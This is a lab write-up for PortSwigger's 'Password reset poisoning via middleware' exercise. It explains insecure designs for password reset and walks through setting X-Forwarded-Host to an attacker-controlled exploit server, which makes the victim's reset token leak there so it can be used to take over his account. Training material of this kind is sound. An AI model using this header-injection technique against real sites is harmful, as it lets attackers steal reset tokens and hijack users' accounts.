## Password reset poisoning via middleware

**Title:** Password reset poisoning via middleware. [Go](https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-poisoning-via-middleware)

**Description:** This lab is vulnerable to password reset poisoning. The user `carlos` will carelessly click on any links in emails that he receives. To solve the lab, log in to Carlos's account. You can log in to your own account using the following credentials: `wiener:peter`. Any emails sent to this account can be read via the email client on the exploit server. 

## Preface

In practice, it is a given that some users will forget their password, so it is common to have a way for them to reset it. As the usual password-based authentication is obviously impossible in this scenario, websites have to rely on alternative methods to make sure that the real user is resetting their own password. For this reason, the password reset functionality is inherently dangerous and needs to be implemented securely.

There are a few different ways that this feature is commonly implemented, with varying degrees of vulnerability.

**Sending passwords by email**

It should go without saying that sending users their current password should never be possible if a website handles passwords securely in the first place. Instead, some websites generate a new password and send this to the user via email.

Generally speaking, sending persistent passwords over insecure channels is to be avoided. In this case, the security relies on either the generated password expiring after a very short period, or the user changing their password again immediately. Otherwise, this approach is highly susceptible to man-in-the-middle attacks.

Email is also generally not considered secure given that inboxes are both persistent and not really designed for secure storage of confidential information. Many users also automatically sync their inbox between multiple devices across insecure channels.

**Resetting passwords using a URL**

A more robust method of resetting passwords is to send a unique URL to users that takes them to a password reset page. Less secure implementations of this method use a URL with an easily guessable parameter to identify which account is being reset, for example:

`http://vulnerable-website.com/reset-password?user=victim-user`

In this example, an attacker could change the `user` parameter to refer to any username they have identified. They would then be taken straight to a page where they can potentially set a new password for this arbitrary user.

A better implementation of this process is to generate a high-entropy, hard-to-guess token and create the reset URL based on that. In the best case scenario, this URL should provide no hints about which user's password is being reset.

`http://vulnerable-website.com/reset-password?token=a0ba0d1cb3b63d13822572fcff1a241895d893f659164d4cc550b421ebdd48a8`

When the user visits this URL, the system should check whether this token exists on the back-end and, if so, which user's password it is supposed to reset. This token should expire after a short period of time and be destroyed immediately after the password has been reset.

However, some websites fail to also validate the token again when the reset form is submitted. In this case, an attacker could simply visit the reset form from their own account, delete the token, and leverage this page to reset an arbitrary user's password.

If the URL in the reset email is generated dynamically, this may also be vulnerable to password reset poisoning. In this case, an attacker can potentially steal another user's token and use it change their password.

## Methodology

### Finding the vulnerable parameter

While solving this lab we are interested in `POST /forgot-password?temp-forgot-password-token` endpoint.

### My thought

With Burp running, after investigating the password reset functionality we observed that a link containing a unique reset token is sent via email. We sent the `POST /forgot-password` request to Burp Repeater and noticed that the `X-Forwarded-Host` header is supported and we can use it to point the dynamically generated reset link to an arbitrary domain. After that we make a note of our exploit server URL. Then we went back to the request in Burp Repeater and added the `X-Forwarded-Host` header with our exploit server URL: `X-Forwarded-Host: OUR-EXPLOIT-SERVER-ID.exploit-server.net` Changing the username parameter to `carlos` and sent the request. In exploit server  access log we should see a `GET /forgot-password` request, which contains the victim's token as a query parameter.  Going back to our email client and copying the valid password reset link (not the one that points to the exploit server). After pasting this into the browser and change the value of the `temp-forgot-password-token` parameter to the value that we stole from the victim. Load this URL and set a new password for Carlos's account. After that we logged in to Carlos's account using the new password to solve the lab.
